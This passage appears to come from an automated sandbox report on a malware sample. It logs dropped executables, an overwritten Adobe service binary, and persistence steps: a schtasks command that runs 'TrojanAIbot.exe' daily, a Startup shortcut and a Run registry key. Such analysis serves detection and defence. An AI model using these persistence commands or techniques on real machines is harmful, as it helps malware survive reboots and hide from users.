                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2AADF push 02B2AB18h; ret 4_2_02B2AB10
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1CA4E push 02B1CD72h; ret 4_2_02B1CD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B1CBEC push 02B1CD72h; ret 4_2_02B1CD6A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2886C push 02B288AEh; ret 4_2_02B288A6
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B84850 push eax; ret 4_2_02B84920
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2790C push 02B27989h; ret 4_2_02B27981
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B26946 push 02B269F3h; ret 4_2_02B269EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B26948 push 02B269F3h; ret 4_2_02B269EB
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B25E7C push ecx; mov dword ptr [esp], edx4_2_02B25E7E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B22F60 push 02B22FD6h; ret 4_2_02B22FCE
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 11_2_00EF0C55 push edi; retf 11_2_00EF0C7A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04784277 push ebx; ret 13_2_047842DA

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\neworigin.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_02B2AB1C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
